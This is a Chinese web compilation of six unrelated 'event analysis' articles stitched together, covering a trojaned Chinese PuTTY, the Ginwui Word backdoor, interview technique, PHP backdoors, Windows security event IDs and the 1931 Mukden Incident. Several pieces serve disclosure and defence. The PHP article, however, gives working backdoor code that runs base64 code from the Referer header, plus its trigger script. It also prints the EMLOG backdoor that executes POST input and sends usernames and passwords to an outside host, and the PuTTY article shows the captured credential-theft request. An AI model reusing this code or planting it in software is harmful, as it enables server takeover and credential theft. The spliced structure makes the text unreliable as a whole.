以下是小编整理的中文版putty后门事件分析,本文共6篇,欢迎阅读分享,希望对大家有帮助。
篇1:中文版putty后门事件分析
近几日,中文版putty等SSH远程管理工具被曝出存在后门,该后门会自动窃取管理员所输入的SSH用户名与口令,并将其发送至指定服务器上,知道创宇安全研究小组在第一时间获取该消息后,对此次事件进行了跟踪和分析
根据分析,此次事件涉及到来自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站点的中文版putty、WinSCP、SSHSecure和psftp等软件,而这些软件的英文版本不受影响。1.时间线
1月25日: 有网友发布消息称putty和winscp中装有后门程序,但该条微博并未提及后门程序的类型及其技术细节,而且消息也未被过多的人所重视,目前无法确定该条微博是否与此次事件有关联:
570)?'570px':'auto';}“ height=”132“ src=”img2.shangxueba.com/img/jb51_jbImg/0717/11/FB9E439E6C6A293865190D13CDAB7C5A.png“ width=”339“ alt=”“ />
1月30日下午16点左右:互联网上再度出现关于中文版putty等SSH管理软件被装有后门的消息,并且此消息对后门的行为特征进行了简要的描述 —— 该程序会导致root密码丢失,但发布者仍未披露具体的技术细节:
570)?'570px':'auto';}” height=“1” src=“img2.shangxueba.com/img/jb51_jbImg/20140717/11/3C99244DDC7C2C5A531FA26CE644076A.png” width=“1” alt=“” />
以上微博的短URL所对应的文章截图如下:
570)?'570px':'auto';}“ height=”454“ src=”img2.shangxueba.com/img/jb51_jbImg/20140717/11/217AEF684BADC7E6A74544E2C8C273DD.png“ width=”791“ alt=”“ />
1月31日:经过一晚的酝酿,putty事件开始在互联网上广泛传播,微博、论坛等信息发布平台上开始大量出现putty后门事件的消息,同时,很多技术人员也开始对含有后门的putty等SSH管理软件进行技术分析,并陆续发布其中的技术细节。
2.事件分析
2.1问题软件源头
知道创宇安全研究团队在获取信息后,第一时间对putty等软件进行了跟踪分析。通过分析发现,来自以下几个站点的中文版putty、WinSCP、SSHSecure和psftp等软件都可能存在后门程序:
www.putty.org.cn
www.putty.ws
www.winscp.cc
www.sshsecure.com
2.2行为分析
2.2.1网络行为分析
使用带有后门程序的中文版putty等SSH管理软件连接服务器时,程序会自动记录登录时的用户名、密码和服务器IP地址等信息,并会以HTTP的方式将这些信息发送到指定的服务器上,以下是在分析过程中抓取到的原始HTTP数据:
GET /yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/0613 Firefox/6.0a2
Host: l.ip-163.com:88
Pragma: no-cache
从以上数据可以获得以下信息:
敏感信息通过HTTP GET的方式发送到服务器l.ip-163.com上(经测试,该域名与putty.org.cn位于同一IP地址上)
用于收集密码的程序地址为 l.ip-163.com:88/yj33/js2.asp
敏感信息以GET参数的方式发送到服务器上,相关参数为:
act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY
每个字段的作用如下:
act为执行的动作,参数add用于添加信息,经测试,也可使用del来删除信息
user为SSH服务器的IP地址,此处为50.23.79.188
pwd为连接服务器时的登录用户名,此处为abc
ll1为登录密码,此处为pass
ll2为目标服务器的SSH端口,此处为22(即,默认端口)
ll3则为客户端类型,此处为PuTTY
2.2.2服务器本地文件分析
知道创宇安全研究团队借助文件完整性校验的方式,对服务器初始安全状态下的 /etc、/lib、/usr、/bin等敏感目录进行了完整性备份,并在putty连接测试后对这些目录的文件变更、丢失和添加等情况进行了校验,校验结果显示,中文版putty并未对服务器自动安装后门程序,
网络上部分消息称,有些使用中文版putty进行过远程管理的服务器上出现恶意代码和文件,可能是由于恶意用户获取了putty所收集的密码后人为植入所致。
2.3事件后续
截止至2月1日,在本次事件中所涉及的以下域名均已不能访问:
www.putty.org.cn
putty.ws
www.winscp.cc
www.sshsecure.com
l.ip-163.com:88
但是,在1月31日晚,网络上传出“l.ip-163.com被黑”的消息并配有一张“受害者列表”的截图:
570)?'570px':'auto';}” height=“593” src=“img2.shangxueba.com/img/jb51_jbImg/20140717/11/5D4B7325928CB5A9C9DD81AE9F6954EB.png” width=“549” alt=“” />
而就在此消息发布不久之后,互联网上便出现了完整的受害者列表供所有用户浏览和下载,根据这份来自互联网列表的显示,不但有众多 位列其中,IBM、Oracle、HP等大厂商的服务器也出现在列表内。
3.安全建议
若您使用过中文版的putty、WinSCP、SSHSecure和psftp等软件,但暂时又不能对服务器进行下线处理,可采取以下临时解决方案来处理:
使用chkrootkit或rootkit hunter对服务器进行扫描,检查是否存在已知后门
查看网络是否有可疑外联,并加强对可疑外联的监控
在网络层建立端口访问控制策略,阻止除正常业务外的一切非业务、非管理端口
更换SSH登录密码,建议登录时使用证书加密码的组合方式进行身份验证
登录SSH时,不要直接使用root用户,先使用普通用户登录后,再su至root
服务器端通过TCP Wrapper或iptables等软件,限制IP访问,仅允许特定IP地址对服务器的SSH进行连接和管理
如需使用putty、WinSCP等软件,可访问其官方站点下载:
www.putty.org/
winscp.net/eng/docs/lang:chs
篇2:Ginwui后门程序分析
今年5月19日CVE发布编号为CVE--2492安全公告,Microsoft Word处理DOC文件存在缓冲区溢出漏洞,Microsoft Word运行特殊构造的doc文件,导致执行任意代码,远程攻击者可以利用此漏洞通过诱骗用户打开恶意DOC文件在用户机器上执行任意指令。微软于6月13号发布该漏洞的补丁。5月24日发现攻击者利用此漏洞构造特殊的Word文档进行传播,存在漏洞的Word打开该文档将导致文件中的后门Ginwui.exe运行,下面我们分析这个后门的运作机制。
一、Ginwui.exe的行为分析
Ginwui.exe将自身复制为临时目录下的20060426.bak,然后执行20060426.bak并删除原程序文件Ginwui.exe。20060426.bak文件释放zsydll.dll和zsyhide.dll到%windir%system32目录下并将zsydll.dll注入Winlogon.exe进程中。Winlogon.exe启动%ProgramFiles%Internet ExplorerIEXPLORE.EXE,并连接域名scfzf.xicp.net 。zsyhide.dll在注册表AppInit_DLLs键下添加%windir%system32zsyhide.dll,zsydll.dll在注册表创建zsydll项以便系统重启后重新加载运行。
zsyhide.dll文件注册表详细导出:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWindows]
AppInit_DLLs=C:WINNTsystem32zsyhide.dll
zsydll.dll文件注册表详细导出:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonNotifyzsydll]
DllName=C:WINNTsystem32zsydll.dll
Shutdown=DoShutdown
Startup=DoStartup
Asynchronous=dword:00000001
Impersonate=dword:00000000
二、Ginwui.exe的清除方法
系统重启后执行cmd.exe,把%windir%system32目录下的zsydll.dll和zsyhide.dll改名,删除在注册表中的zsydll项和AppInit_DLLs项下的C:WINNTsystem32zsyhide.dll键值,
重启系统把%windir%system32目录下的zsyhide.dll和zsydll.dll删除(改名后的文件),临时目录下的20060426.bak可以直接删除。
三、危害
远程攻击者完全控制被攻击的主机,拥有系统权限,可以对系统进行任意操作。比如盗取用户的帐户和口令、个人信息、信用卡帐户等。
四、传播方式
Ginwui.exe是目前利用WORD漏洞进行传播的木马程序,从上面分析来看不仅可以利用WORD漏洞进行传播,还可以利用以前的IE漏洞、FLASH漏洞等方式来进行传播。
五、防范措施
6月13日微软发布等级为严重的安全公告 MS06-027(Microsoft Word 中的漏洞可能允许远程执行代码),该漏洞利用格式错误的对象指针的 Word 中存在一个远程执行代码漏洞。攻击者可以通过构建特制的 Word 文件来利用此漏洞,此文件可能允许远程执行代码。微软针对此漏洞已发布安全补丁,请及时更新。
临时解决方法是以安全模式的方式运行该软件--在Word的快捷方式中添加命令行“WINWORD.EXE /safe”。请及时更新杀毒软件的病毒库。使用防火墙规则禁止系统从内部对localhosts.3322.org和scfzf.xicp.net进行连接。
微软及杀毒厂商已经把Ginwui.exe定义为Ginwui.B或Backdoor.Win32.Ginwui.b后门病毒。
篇3:行为事件面试分析
行为事件面试方法的主要目的是了解应聘人员的真实素质,通过其过去的行为预测其未来可能的表现,行为事件面试方法的优势是传统的面试方法所不能比的。这种面试方法是让应聘人员在指定的范围内描述出非常具体的工作事件,并以具体的问题进一步追问,从而了解应聘人员的真实情况。
基于此原理,在应用行为事件面试方法时,首先要了解本企业是否已经建立了胜任素质模型;如果没有建立,至少要清楚适合本企业的一些通用的素质要求。否则就算是对行为事件面试方法比较熟悉,也仍难以从应聘人员所描述的行为事件中判断应聘人员的素质。
行为事件面试方法的优点
与传统的招聘面谈相比,行为事件面试方法有以下优点:
客观性:行为事件面试是面试人员基于己有的胜任素质模型和各种素质的行为描述对应聘人员的回答做出分析和判断的过程,这大大提高了招聘面谈的客观性。而在传统的招聘面谈中,面试人员心目中没有客观、统一的要求和标准,如果有也仅是代表个人的,具有很大的主观性。
针对性:在行为事件面试过程中,面试人员可根据该岗位的特点,要求应聘人员针对性地说出自己过去的工作事件,并且要描述这些工作事件是有效的还是无效的。面试人员通过应聘人员陈述的事件预测他未来在该方面的行为表现,这便大大增加了招聘面谈的针对性。传统的招聘面谈只让应聘者讲述过去的经验和曾从事的活动,应聘者的许多报告只是泛泛而谈,面试人员对于其工作业绩的好坏不得而知。
准确性:行为事件面试方法关注应聘者在过去的事件中做出的具体行为,面试人员很容易判断应聘人员素质的高低。而在传统招聘面谈中,应聘人员自己评价自己,如描述的优缺点、爱好、理想、态度以及人生哲学等,这些方面并不能说明个人的实际行为表现。
真实性:在行为事件面试过程中,由于应聘人员被要求讲述具体的事件以及自己在其中的表现,而非想象其会怎么做,一般应聘人员很难杜撰出一件事来。由于市场上流行许多帮助应聘人员在面谈时如何表现和回答问题的书,使用传统的招聘面谈方法时,应聘人员很容易虚构或讲出容易取悦于面试人员的话。而且由于不少应聘人员受过应付招聘面谈方面的培训,他们倾向于作出模式化的回答,这使得招聘面谈没有区分度。而行为事件面试方法由于针对个人的工作行为,能够挖掘每个应聘人员的实际工作能力,从而加强了招聘面谈的真实度。
行为事件面试技巧
行为事件面试法中也需要使用技巧,具体来讲,有以下几个方面:
从好的事件开始询问:让应聘人员先非常简单地描叙关键事件的概要,在应聘人员详细讲完一个工作事件之前,不要让其转到别的事件上。
引导应聘人员按事件发生的时间顺序来报告:一旦发现应聘人员的报告中有跳跃,就提出问题请其提供详细的资料。
让应聘人员讲叙过去发生的事件,而非假定的事情或抽象的思想观点。如果应聘人员讲的是抽象的观点,立即让其举例予以说明,从而达到探求细节、刨根问底的目的。例如,如果应聘人员回答到:“我们大家都很能吃苦”,则面试人员需要就这句话进行追问:“能否举出一件最近的实例,表明你本人在工作中很能吃苦的情况”。
尽量使用简单的问话引导应聘人员讲出事件的细节,而且要让应聘人员讲过去而非现在的看法或行为。
如果应聘人员在叙述中提及“我们”,一定要问清楚“我们”是指谁,目的在于了解应聘人员在当时的情景中做了什么从而可以追问应聘人员行为背后的思想。如:“您是如何作出那个决定的?”或“您当时是怎么想的?”
如果应聘人员在面谈中变得很情绪化,就要暂时停止发问直到其平静下来为止,
这样的例子在实际面试工作是会碰见的,我在招聘时就遇到过这样的事。当时我问的是一个有关坚韧性方面的问题,结果这位应聘人员在描述其过去的行为时,不知不觉眼泪就流出来,并对面试工作产生影响。
如果面试人员不能想到任何具体事件,你可以通过自己的经历举例,向其描述一个完整的事件,或让其思考和回忆以前的经历。
不要过多地重复应聘人员的话,一来得不到新的信息,二来很可能被应聘人员理解为一种引导性的问题。
不要给应聘人员过多地限定报告的范围,不要给应聘人员提供过多建议。如果应聘人员向你咨询意见,可顺势将问题返还。
通过关键工作事件了解应聘人员素质:事件包括背景、个人的行动以及后果;了解应聘人员在特定工作情境中的思想、感受和愿望,尤其是其在当时情景中究竟是如何做的;尽可能让应聘人员详细而具体地描述自己的行为和想法,而不要依赖他们自己的总结。
行为事件面试方法实例剖析:
以下是行为事件面试方法的一个具体案例,也是我一次具体面试工作的记录。
面试素质:团队合作
面试问题:请告诉我一件你最近在工作中与其他人共同解决问题的事件。
行为面试要点:这件事发生在什么情况下?与你一起工作的是什么人(进一步了解其合作的动机),你当时承担什么样的职责?你们采取什么方式工作?在这一过程中你们对问题的看法有没有不同(深层次的了解)?任务完成后,你的合作者如何评价你?
应聘者陈述:“还是在今年五月份的时候,当时我和我的一个同事在编写一个应用软件时,发生了一些不同的看法。应该说是在一个算法的实现上应该怎么做,我们两个意见不一样,当时时间特别紧,应该还是大概还剩十天的时间就要给结果了。但是就因为那个问题,我们吵了三天,就是什么事也不干,就吵,这个问题应该怎么做。吵了三天,吵了没有结果的时候,就在我们那个学校里面,环境也比较好,就兜一圈,再回来就接着吵。我觉得象这种做事情肯定会有意见不一致的,而且争论也是有必要的,争论的结果是可以找到最好的办法。最后好象不是我们两个原始的意见,最后好象还去过图书馆,还看过一点东西,可以说最后还是一起做出来的吧。”
案例分析:团队合作这一胜任素质模型共有四级,其中最高一级的解释是:积极寻求并尊重他人的观点,促进群体的合作气氛。在承认群体成员因观点不同而存在分歧的基础上,通过有效的方法解决分歧,从而较好地完成任务;群体中的成员观点不一致时,能够理解彼此的思想,求同存异;调动群体中所有成员的积极性和参与感,提高群体的凝聚力;设法解决群体成员的困难,使其愿意保留在群体当中。
以上实例分析,该应聘人员是符合上诉对团队合作第四级的解释的,因而做为一个面试考官,我们可以基本判定,该应聘人员具有较强的团队合作精神这一素质。
行为事件面试谨防非行为事件描述
当然,我们在面试过程中,常常会碰到一些非行为面试的描述语句,还是上面的面试问题,在面试过程中,会经常碰到如下的回答:
“这样的事情是很多的,我基本上都是和同事一起完成工作的。我这个人不会和同事发生争执,基本上都是大家一起做,也没有什么矛盾。有时我们也会加班,其实大家在一起都还是比较愉快的……”
上面的回答,根本无法让我判断他的合作性问题,尽管我也尽可能多的引导他回到举实际的事件上来,但这位应聘人员始终回避问题,绕圈子。所以,我只能判断他的思维能力不强,还有就是在过去的工作中没有做出什么特别的业绩,因而这样的人我一般是不会录用他的。
非行为事件的描述中,较多的会使用理论性意见词语:应该、我会、我想、可能等。含糊而不精确的词语:经常、有时、常常等。角色不清楚的词语:我们、每个人、大家等。
当遇到这样的描述词语时,做为面试人员要进行引导,如果引导不成功,那就要结束你的面试了,否则是在浪费时间。
各类简历模板、面试技巧可以参看58求职指南
篇4:一些常见的PHP后门原理分析
通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果
本地测试结果如下图,
本程序只作为学习作用,请勿拿去做坏事。
复制代码
代码如下://1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
eval(base64_decode(str_replace(“ ”, “+”, implode(array_slice($a, 6)))));
}
//2.php
header('Content-type:text/html;charset=utf-8');
//要执行的代码
$code = <<
phpinfo;
CODE;
//进行base64编码
$code = base64_encode($code);
//构造referer字符串
$referer = “a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=”;
//后门url
$url = 'localhost/test1/1.php';
$ch = curl_init();
$options = array(
CURLOPT_URL =>$url,
CURLOPT_HEADER =>FALSE,
CURLOPT_RETURNTRANSFER =>TRUE,
CURLOPT_REFERER =>$referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);
最近EMLOG源代码被污染,有些用户下载的出现了以下的后门代码
复制代码
代码如下:if (isset($_GET[“rsdsrv”])) {
if($_GET[“rsdsrv”] == “20c6868249a44b0ab92146eac6211aeefcf68eec”){
@preg_replace(“//e”,$_POST['IN_EMLOG'],“Unauthorization”);
}
}
file_get_contents(“某域名/?url=”.base64_encode($_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']).“&username=”.base64_encode($username).“&password=”.base64_encode($password));
篇5:WindowsServer“安全事件ID”分析
根据下面的ID,可以帮助我们快速识别由WindowsServer2003操作系统生成的安全事件,究竟意味着什么事件出现了,
一、帐户登录事件
下面显示了由“审核帐户登录事件”安全模板设置所生成的安全事件。
672:已成功颁发和验证身份验证服务(AS)票证。
673:授权票证服务(TGS)票证已授权。TGS是由Kerberosv5票证授权服务(TGS)颁发的票证,允许用户对域中的特定服务进行身份验证。
674:安全主体已更新AS票证或TGS票证。
675:预身份验证失败。用户键入错误的密码时,密钥发行中心(KDC)生成此事件。
676:身份验证票证请求失败。在WindowsXPProfessional或WindowsServer家族的成员中不生成此事件。
677:TGS票证未被授权。在WindowsXPProfessional或WindowsServer家族的成员中不生成此事件。
678:帐户已成功映射到域帐户。
681:登录失败。尝试进行域帐户登录。在WindowsXPProfessional或WindowsServer家族的成员中不生成此事件。
682:用户已重新连接至已断开的终端服务器会话。
683:用户未注销就断开终端服务器会话。
二、帐户管理事件
下面显示了由“审核帐户管理”安全模板设置所生成的安全事件。
624:用户帐户已创建。
627:用户密码已更改。
628:用户密码已设置。
630:用户帐户已删除。
631:全局组已创建。
632:成员已添加至全局组。
633:成员已从全局组删除。
634:全局组已删除。
635:已新建本地组。
636:成员已添加至本地组。
637:成员已从本地组删除。
638:本地组已删除。
639:本地组帐户已更改。
641:全局组帐户已更改。
642:用户帐户已更改。
643:域策略已修改。
644:用户帐户被自动锁定。
645:计算机帐户已创建。
646:计算机帐户已更改。
647:计算机帐户已删除。
648:禁用安全的本地安全组已创建。
注意:
从正式名称上讲,SECURITY_DISABLED意味着该组不能用来授权访问检查。
649:禁用安全的本地安全组已更改。
650:成员已添加至禁用安全的本地安全组。
651:成员已从禁用安全的本地安全组删除。
652:禁用安全的本地组已删除。
653:禁用安全的全局组已创建。
654:禁用安全的全局组已更改。
655:成员已添加至禁用安全的全局组。
656:成员已从禁用安全的全局组删除。
657:禁用安全的全局组已删除。
658:启用安全的通用组已创建。
659:启用安全的通用组已更改。
660:成员已添加至启用安全的通用组。
661:成员已从启用安全的通用组删除。
662:启用安全的通用组已删除。
663:禁用安全的通用组已创建。
664:禁用安全的通用组已更改。
665:成员已添加至禁用安全的通用组。
666:成员已从禁用安全的通用组删除。
667:禁用安全的通用组已删除。
668:组类型已更改。
684:管理组成员的安全描述符已设置。
注意:
在域控制器上,每隔60分钟,后台线程就会搜索管理组的所有成员(如域、企业和架构管理员),并对其应用一个固定的安全描述符。该事件已记录。
685:帐户名称已更改。
三、目录服务访问事件
下面显示了由`审核目录服务访问`安全模板设置所生成的安全事件。
566:发生了一般对象操作。
四、登录事件ID
528:用户成功登录到计算机。
529:登录失败。试图使用未知的用户名或已知用户名但错误密码进行登录。
530:登录失败。试图在允许的时间外登录。
531:登录失败。试图使用禁用的帐户登录。
532:登录失败。试图使用已过期的帐户登录。
533:登录失败。不允许登录到指定计算机的用户试图登录。
534:登录失败。用户试图使用不允许的密码类型登录。
535:登录失败。指定帐户的密码已过期。
536:登录失败。NetLogon服务没有启动。
537:登录失败。由于其他原因登录尝试失败。
注意:
在某些情况下,登录失败的原因可能是未知的。
538:用户的注销过程已完成。
539:登录失败。试图登录时,该帐户已锁定。
540:用户成功登录到网络。
541:本地计算机与列出的对等客户端身份(已建立安全关联)之间的主要模式Internet密钥交换(IKE)身份验证已完成,或者快速模式已建立了数据频道。
542:数据频道已终止。
543:主要模式已终止。
注意:
如果安全关联的时间限制(默认为8小时)过期、策略更改或对等终止,则会发生此情况。
544:由于对等客户端没有提供有效的证书或者签名无效,造成主要模式身份验证失败。
545:由于Kerberos失败或者密码无效,造成主要模式身份验证失败。
546:由于对等客户端发送的建议无效,造成IKE安全关联建立失败。接收到的程序包包含无效数据。
547:在IKE握手过程中,出现错误。
548:登录失败。来自信任域的安全标识符(SID)与客户端的帐户域SID不匹配。
549:登录失败。在林内进行身份验证时,所有与不受信任的名称空间相关的SID将被筛选出去。
550:可以用来指示可能的拒绝服务(DoS)攻击的通知消息。
551:用户已启动注销过程。
552:用户使用明确凭据成功登录到作为其他用户已登录到的计算机。
682:用户已重新连接至已断开的终端服务器会话。
683:用户还未注销就断开终端服务器会话。注意:当用户通过网络连接到终端服务器会话时,就会生成此事件。该事件出现在终端服务器上。
五、对象访问事件
下面显示了由`审核对象访问`安全模板设置所生成的安全事件。
560:访问权限已授予现有的对象,
562:指向对象的句柄已关闭。
563:试图打开一个对象并打算将其删除。
注意:
当在Createfile()中指定了FILE_DELETE_ON_CLOSE标记时,此事件可以用于文件系统。
564:受保护对象已删除。
565:访问权限已授予现有的对象类型。
567:使用了与句柄关联的权限。
注意:
创建句柄时,已授予其具体权限,如读取、写入等。使用句柄时,最多为每个使用的权限生成一个审核。
568:试图创建与正在审核的文件的硬链接。
569:授权管理器中的资源管理器试图创建客户端上下文。
570:客户端试图访问对象。
注意:
在此对象上发生的每个尝试操作都将生成一个事件。
571:客户端上下文由授权管理器应用程序删除。
572:AdministratorManager(管理员管理器)初始化此应用程序。
772:证书管理器已拒绝挂起的证书申请。
773:证书服务已收到重新提交的证书申请。
774:证书服务已吊销证书。
775:证书服务已收到发行证书吊销列表(CRL)的请求。
776:证书服务已发行CRL。
777:已制定证书申请扩展。
778:已更改多个证书申请属性。
779:证书服务已收到关机请求。
780:已开始证书服务备份。
781:已完成证书服务备份。
782:已开始证书服务还原。
783:已完成证书服务还原。
784:证书服务已开始。
785:证书服务已停止。
786:已更改证书服务的安全权限。
787:证书服务已检索存档密钥。
788:证书服务已将证书导入其数据库中。
789:证书服务审核筛选已更改。
790:证书服务已收到证书申请。
791:证书服务已批准证书申请并已颁发证书。
792:证书服务已拒绝证书申请。
793:证书服务将证书申请状态设为挂起。
794:证书服务的证书管理器设置已更改。
795:证书服务中的配置项已更改。
796:证书服务的属性已更改。
797:证书服务已将密钥存档。
798:证书服务导入密钥并将其存档。
799:证书服务已将证书颁发机构(CA)证书发行到MicrosoftActiveDirectory?目录服务。
800:已从证书数据库删除一行或多行。
801:角色分离已启用。
六、审核策略更改事件
下面显示了由`审核策略更改`安全模板设置所生成的安全事件。
608:已分配用户权限。
609:用户权限已删除。
610:与其他域的信任关系已创建。
611:与其他域的信任关系已删除。
612:审核策略已更改。
613:Internet协议安全(IPSec)策略代理已启动。
614:IPSec策略代理已禁用。
615:IPSec策略代理已更改。
616:IPSec策略代理遇到一个可能很严重的故障。
617:Kerberosv5策略已更改。
618:加密数据恢复策略已更改。
620:与其他域的信任关系已修改。
621:已授予帐户系统访问权限。
622:已删除帐户的系统访问权限。
623:按用户设置审核策略。
625:按用户刷新审核策略。
768:检测到两个林的名称空间元素之间有冲突。
注意:
当两个林的名称空间元素重叠时,解析属于其中一个名称空间元素的名称时,将发生歧义。这种重叠也称为冲突。并非所有的参数对每一项类型都有效。例如,对于类型为TopLevelName的项,有些字段无效,如DNS名称、NetBIOS名称和SID。
769:已添加受信任的林信息。
注意:
当更新林信任信息并且添加了一个或多个项时,将生成此事件消息。为每个添加、删除或修改的项生成一个事件消息。如果在林信任信息的一个更新中添加、删除或修改了多个项,则为生成的所有事件消息指派一个唯一标识符,称为操作ID。该标识符可以用来确定生成的多个事件消息是一个操作的结果。并非所有的参数对每一项类型都有效。例如,对于类型为TopLevelName的项,有些参数是无效的,如DNS名称、NetBIOS名称和SID。
770:已删除受信任的林信息。
注意:
请参见事件769的事件描述。
771:已修改受信任的林信息。
注意:
请参见事件769的事件描述。
805:事件日志服务读取会话的安全日志配置。
七、特权使用事件
下面显示了由`审核特权使用`安全模板设置所生成的安全事件。
576:指定的特权已添加到用户的访问令牌中。
注意:
当用户登录时生成此事件。
577:用户试图执行需要特权的系统服务操作。
578:特权用于已经打开的受保护对象的句柄。
八、详细的跟踪事件
下面显示了由`审核过程跟踪`安全模板设置所生成的安全事件。
592:已创建新进程。
593:进程已退出。
594:对象句柄已复制。
595:已获取对象的间接访问权。
596:数据保护主密钥已备份。
注意:
主密钥用于CryptProtectData和CryptUnprotectData例程以及加密文件系统(EFS)。每次新建主密钥时都进行备份。(默认设置为90天。)通常由域控制器备份主密钥。
597:数据保护主密钥已从恢复服务器恢复。
598:审核过的数据已受保护。
599:审核过的数据未受保护。
600:已分配给进程主令牌。
601:用户试图安装服务。
602:已创建计划程序任务。
九、审核系统事件
下面显示了由`审核系统事件`安全模板设置所生成的系统事件。
512:Windows正在启动。
513:Windows正在关机。
514:本地安全机制机构已加载身份验证数据包。
515:受信任的登录过程已经在本地安全机构注册。
516:用来列队审核消息的内部资源已经用完,从而导致部分审核数据丢失。
517:审核日志已清除。
518:安全帐户管理器已加载通知数据包。
519:进程正在使用无效的本地过程调用(LPC)端口,试图伪装客户端并向客户端地址空间答复、读取或写入。
520:系统时间已更改。
注意:
在正常情况下,该审核出现两次。
篇6:九一八事件的背景分析
九一八事件的背景分析
一、事件简介
1931年9月18日晚上上10点30分,占据在中国东北的日本关东军按照他们早已策划好的阴谋,派铁道“守备队”去炸毁沈阳北郊柳条湖附近的一小段南满铁路路轨,并嫁祸给中国军队。接着日本将此作为借口,驻扎在南满铁路沿线的日本军队分别向沈阳城内和长春、四平街、公主岭等地发起进攻。由于东北军接到上级的命令,要求执行“不抵抗政策”,日军在当晚便轻松地攻占北大营,并且在次日占领了沈阳城。日军继续向辽宁、吉林和黑龙江的广大地区进攻,在短短的4个多月内,日本侵占了山海关至黑龙江之间相当于日本本土面积3倍的110万平方公里的中国领土。这就是震惊中外的“九一八”事变。__、石原莞尔、__,是“九一八”事变的直接策划者和实施者。
二、日本的裁军行动
日本是一个国土面积小,本土资源相对贫乏的后起资本主义国家,经过明治维新的改革后,日本资本主义逐渐发展,但是由于日本狭小的国内市场以及贫乏的资源,日本资本主义之间的矛盾渐渐加深。第一次世界大战结束后,日本军国主义势力进一步控制本国政权,对内镇压人民,对外侵略扩张。
自19的华盛顿会议后,日本开始了大规模裁军的行动。军费支出减少了,可是大规模的裁军却引起了被裁的军人的不满。因为自从明治维新以来,日本一直奉行着军事优先的原则,他们培养了大批的职业军人。职业军人在日本社会上是最受尊敬的人,军人是一个最让人感到光荣的职业。职业军人除了军事以外没有其他特长,裁军等于砸他们的饭碗,是个灾难。裁军开始后,曾经值得人民尊敬的职业军人一下变成社会上多余的人,学生不再那么想报考军事院校,一些饭店甚至拒绝穿军服者进入。环境的落差一下子给被裁的职业军人带来了严重的失落感。但是一些不甘无所事事的的军人开始秘密集会,接着天剑党、樱会、一夕会等军人秘密组织纷纷成立,这些组织有着类似的宗旨,就是为了改造国家,不惜使用武力。而且多数组织还是属于法西斯组织,在日本的政变事件中都有这些组织的参与。在政治上难免会有一些法西斯极端思想的注入,日本的政治和军队建设也会受其影响。不过当时最有名的还是石原莞尔,是他提出“满蒙生命线”的理论。石原后来也成为九一八事变的主谋。
三、“满蒙生命线”论
日本为何有发动九一八事件的阴谋?其中的一个原因就是思想上受侵华理论的驱使。一些政治家通过鼓吹这些理论来获得民众对发动战争的支持。中国东北在当时是日本最大的原料供应地,1930年日本从中国东北进口的物资已经占日本一年整个进口的11%,其铸铁占进口额的46%、煤占64%、豆类占76%。中国东北也是日本最大的投资场所和商品销售市场。日本出口总额的8%是输入中国东北地区。对于资源贫乏的日本来说,中国东北资源丰富,有着非常大的的经济利益。而且东北是日本实现所谓的“大陆政策”中在将来能够称霸世界必要的重要基地。
满蒙生命线论最开始由石原莞尔提出,他认为未来世界的冲突是东方文明和西方文明的冲突,日本作为东方文明的代表,不可避免地将要和作为西方文明代表的美国进行一场所谓“最终的战争”来决定人类社会在将来的走向和格局。石原觉得在这场“最终战争”的较量中,日本在战略地位上处于不利的一边:国土面积小,没有战略物资资源。在这场持久战的过程中,日本要有一个后方基地才行,这个基地就是满蒙。
在1925年的时候由__确立“满蒙生命线”理论。1929年12月,松冈在太平洋调查会议上说:“在日俄战争中,日本向满洲投入了20亿日元的战费。这笔费用在内,本利可达60亿日元,中国偿还这笔钱了吗?”接着松冈于1930年成为众议院的议员后,在开始议会内外散布“满蒙生命线”说,想以此攻击“币原外交”。1931年春松冈在《动荡之满蒙》小册子中写道:“今天满蒙之地位,对我国说来,不仅在国防上十分重要,而且对国民经济也是不可缺少的。换句话说,作为一个现实问题来看,不仅在我国的国防上,就是在经济上,也可以说是我国的生命线。……我国要牢固地确保和死守这条生命线,而不必害怕任何国家和任何人。”在“九一八”前他还大力鼓吹“满蒙是日本的生命线”,为日本侵华制造大量的舆论。
同年3月,关东军高级参谋__在日本陆军步兵学校发表演说,他声称:“在对俄作战上,满蒙是主要战场;在对美作战上,满蒙是补给的源泉。从而,实际上,满蒙对美、俄、中的作战上都有最重要的关系。由此看来,可以充分了解:满蒙在军事上有着何等重要的地位”④。这次讲话不久。印成《从军事上所见到的满蒙》的小册子迅速散布。同时日本军部发布命令,要求所有记者、讲演者都必须宣传“满洲是日本的‘生命线’,日本必须囊括满洲”;违反这一方针的一切言论和行动的人都要严厉惩罚。从此“满蒙生命线”论迅速风靡日本。
4、经济危机
日本刚度过1927年金融危机又遭到世界经济危机的袭击。1929年世界资本主义经济危机波及日本,由于日本是岛国,资源缺乏,国内市场狭小,日本陷入极端困难的境地。对外贸易的缩减直接影响到工农业生产,1929—1931年日本工业生产总值下降了32.9%。在世界经济危机的打击下,日本广大工农群众为了生存,展开了空前规模的罢工和反对地主的斗争,193l年日本共发动了罢工2415起,打破了历史记录;农村中的租佃纠纷由1930年的2478起上升到3419起。⑤日本国内失业者达到几十万人,如果包括农村,估计有三百万人失业。1930年秋季,稻谷产量大,但米价却因此降到以往的一半以上,使农民遭到了空前的丰收饥谨。到第二年,由于北海道、东北地区的霜冻大歉收,农民的遭遇惨不可言,全家自杀,出卖儿女,学童缺食,到处可见。⑥
可见,日本国内经济一片萧条,单独依靠本国去拯救是不可能的,因为没有资源也没有这个能力。自己解决不了那就只能对外求助了,但是去求助美国等资本主义国家也没用。美国当时都在忙着救自己,哪有精力去管他国。求助他国也解决不了,日本想到它的对外投资,想通过对外投资获得的资源来缓解国内的经济危机。
